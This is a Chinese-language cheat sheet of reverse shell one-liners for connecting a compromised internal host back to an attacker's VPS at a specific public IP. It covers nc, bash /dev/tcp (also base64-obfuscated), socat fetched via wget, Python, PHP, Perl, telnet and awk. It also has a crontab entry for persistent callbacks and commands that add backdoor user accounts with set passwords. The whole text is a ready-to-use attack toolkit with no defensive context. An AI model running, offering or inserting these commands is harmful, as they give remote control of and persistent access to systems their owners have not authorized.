反弹shell

nc反弹

当nc没有-e选项的时候

vps先监听
vps：nc -lvp 2333

内网主机：
rm /tmp/f -rf;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 123.57.62.22 2333 >/tmp/f
或者
mknod backpipe p; nc 123.57.62.22 2333 0<backpipe | /bin/bash 1>backpipe 2>backpipe

nc 存在-e选项的时候

vps:
ncat -lv 2333

内网:
nc -e /bin/bash 123.57.62.22 2333

bash

vps:
ncat -lv 2333

内网主机：
bash -i >& /dev/tcp/123.57.62.22/2333 0>&1
或者base64编码：
bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTIzLjU3LjYyLjIyLzIzMzMgMCA+JjE=}|{base64,-d}|{bash,-i}

socat

vps:
socat TCP-LISTEN:12345 -

内网：
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:123.57.62.22:12345

内网主机没有socat时候

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat     

chmod 755 /tmp/socat           

/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:123.57.62.22：12345

脚本语言：

vps:
nc -lvp 8080

内网主机:
python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("123.57.62.22",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
或者
python -c "import pty;pty.spawn('/bin/bash')"

php:
php -r '$sock=fsockopen("123.57.62.22",8080);exec("/bin/sh -i <&3 >&3 2>&3");'

perl:
perl -e 'use Socket;$i="123.57.62.22";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

telnet:

vps:
nc -vlp 1080   命令结果显示窗口
nc -lvp 8080   命令传输窗口

内网:
telnet 123.57.62.22 8080 | /bin/bash | telnet 123.57.62.22 1080
或者
mknod test p && telnet 123.57.62.22  12345 0<test | /bin/bash 1>test

awk:

vps:
nc -lvp 12345

内网:
awk 'BEGIN{s="/inet/tcp/0/123.57.62.22/12345";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

crontab:

vps:
nc -lvp 12345

内网:
(crontab -l;printf "* * * * *  /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("123.57.62.22",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
")|crontab -

针对交互式不友好

一句话增加用户

useradd newuser;echo "newuser:password"|chpasswd
例:useradd guest;echo 'guest:123456'|chpasswd
useradd -p encrypted_password newuser
例:useradd -p `openssl passwd 123456` guest